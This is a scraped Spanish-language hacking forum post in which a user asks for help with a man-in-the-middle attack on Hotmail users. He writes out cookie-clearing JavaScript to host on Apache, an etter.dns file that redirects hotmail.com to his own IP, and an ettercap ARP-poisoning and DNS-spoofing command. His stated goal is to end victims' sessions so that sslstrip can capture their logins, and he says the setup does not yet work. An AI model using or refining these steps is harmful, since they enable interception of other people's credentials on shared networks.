elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Security Series.XSS. [Cross Site Scripting]


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Hacking (Moderador: toxeek)
| | |-+  sslstrip & arpspoof (cerrar conexión)
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: 1 2 [3] Ir Abajo Respuesta Imprimir
Autor Tema: sslstrip & arpspoof (cerrar conexión)  (Leído 16,548 veces)
thedevilini

Desconectado Desconectado

Mensajes: 52


Ver Perfil
Re: sslstrip & arpspoof (cerrar conexión)
« Respuesta #20 en: 4 Enero 2012, 04:44 am »

Hola a todos los que han comentado esta pregunta, la Conclusión fue muy buena (la de controlar una pagina que contenga un codigo que elimine las cookies) ... alguien de ustedes puede decirme ¿cual es la forma correcta para hacerlo? ... veran les cuento lo que hago... (no me ha funcionado, asi que agradeceria que me dijeran: ¿que es lo que hago mal? o ¿que me falta hacer? ...

COMIENZO modificando el fichero "index.html" ubicado en: " root/var/www "  (obiamente mis intenciones son las de hacer un servidor apache con el codigo funcional antes mencionado:

<META HTTP-EQUIV="REFRESH" CONTENT="5;URL=javascript:window.history.back();">

//Código en javascript que me elimina las cookies

<body >
 <script language="javascript" type="text/javascript">
 if (document.cookie != "") {
 if (confirm("Eliminar todas las Cookies?")) {
 la_cookie = document.cookie.split("; ")
 fecha_fin = new Date
 fecha_fin.setDate(fecha_fin.getDate()-1)
 for (i=0; i<la_cookie.length; i++) {
 mi_cookie = la_cookie.split("=")[0]
 document.cookie = mi_cookie + "=;expires=" + fecha_fin.toGMTString()
 }
 document.write("Se han eliminado: " + la_cookie.length + " Cookies ")
 }
 }
 </script>
 </body>

Lo copio y lo pego tal cual esta... Despues voy a: " backtrack,services,HTTPD,apache_start " (para activar un servidor apache)  cabe mencionar que borro las 2 carpetas que estan en la misma ubicacion que el "index.html" con la intencion de que no estorben en la apertura de la pagina...
paso seguido procedo a modificar la tabla dns abriendo una consola y tecleando :
#locate etter.dns
#nano /usr/share/ettercap/etter.dns
ya que me abre la tabla dns, procedo a sustituir las direcciones ip que estan ahi indicadas, por la mia (en la que ahora esta corriendo el servidor apache con el codigo para borrar las cookies)...
y como la pagina que quiero cerrar es la de hotmail, me que da de la siguiente manera... :

# microsoft sucks
# redirect it to www.linux.org
#

hotmail.com      A   MI_DIRECCION_IP
*.hotmail.com    A   MI_DIRECCION_IP
www.hotmail.com  PTR MI_DIRECCION_IP      # Wildcards in PTR are not allowed

guardo los cambios y procedo a ejecutar :  "ettercap -T -q -i wlan0 -P dns_spoof -M arp // // "

EN RESUMEN: lo que hice fue crear un servidor apache con el codigo para borrar las cookies antes indicado, despues Hacer un envenenemiento dns para reedirigir hotmail al servidor apache... lamentablemente no he tenido muy buenos resultados... ¿Podrian ayudarme?   muchas gracias...

http://foro.elhacker.net/hacking_avanzado/iquestcomo_cerrar_conexiones_para_usar_sslstrip-t349415.0.html;msg1702555;topicseen#ixzz1iSQEPoRi
En línea

Páginas: 1 2 [3] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
La mejor forma de cerrar una conexión
Bases de Datos
dimitrix 3 2,924 Último mensaje 16 Mayo 2011, 12:49 pm
por dimitrix
¿como cerrar conexiones para usar sslstrip?
Hacking
thedevilini 5 4,945 Último mensaje 5 Enero 2012, 23:45 pm
por adastra
ARPSPOOF me deja sin conexion a internet
Hacking
luza 0 2,739 Último mensaje 18 Diciembre 2012, 05:42 am
por luza
ARPspoof + SslStrip
Hacking
karrax 7 6,550 Último mensaje 18 Agosto 2014, 12:36 pm
por faddlenope
ayuda con arpspoof y sslstrip.
Hacking
passgpc 2 2,803 Último mensaje 27 Octubre 2015, 03:34 am
por passgpc
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines